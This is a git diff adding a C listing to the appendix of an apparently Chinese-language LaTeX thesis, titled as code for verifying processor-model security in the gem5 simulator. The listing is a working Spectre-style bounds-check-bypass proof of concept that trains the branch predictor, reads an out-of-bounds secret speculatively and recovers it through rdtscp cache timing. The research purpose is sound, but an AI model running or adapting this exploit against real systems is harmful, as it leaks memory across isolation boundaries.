1 files changed, 63 insertions, 1 deletions

diff --git a/chap/encl1.tex b/chap/encl1.tex
index 1858c65..6a8e62a 100644
--- a/chap/encl1.tex
+++ b/chap/encl1.tex
@@ -3,4 +3,66 @@
 
 \chapter{附件}
 
-% vim:ts=4:sw=4
+\section{在 gem5 中验证处理器模型安全性的代码}\label{lst:poc_for_gem5}
+
+\begin{minted}{C}
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <x86intrin.h>
+
+/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2
+	, L2 2MB assoc 8 */
+#define LLC_SIZE (2 << 20)
+
+uint8_t dummy[LLC_SIZE];
+size_t array_size = 4;
+uint8_t array1[200] = {1, 2, 3, 4};
+uint8_t array2[256 * 64 * 2];
+uint8_t X;
+uint8_t array3[4096];
+uint8_t tmp;
+
+uint8_t victim(size_t idx)
+{
+	if (idx < array_size) {
+		return array2[array1[idx] * 64];
+	}
+	return 0;
+}
+
+int main()
+{
+	unsigned long t[256];
+	volatile uint8_t x;
+
+	victim(0);
+	victim(0);
+	victim(0);
+	victim(0);
+	victim(0);
+
+	memset(dummy, 1, sizeof(dummy)); // flush L2
+	X = 123; // set the secret value, and also bring it to cache
+
+	_mm_mfence();
+
+	size_t attack_idx = &X - array1;
+	victim(attack_idx);
+
+	for (int i = 0; i < 256; i++) {
+		unsigned int junk;
+		unsigned long time1 = __rdtscp(&junk);
+		x ^= array2[i * 64];
+		unsigned long time2 = __rdtscp(&junk);
+		t[i] = time2 - time1;
+	}
+
+	printf("attack_idx = %ld\n", attack_idx);
+	for (int i = 0; i < 256; i++) {
+		printf("%d: %d, %s\n", i, t[i],
+		       (t[i] < 40)? "hit": "miss");
+	}
+}
+\end{minted}
+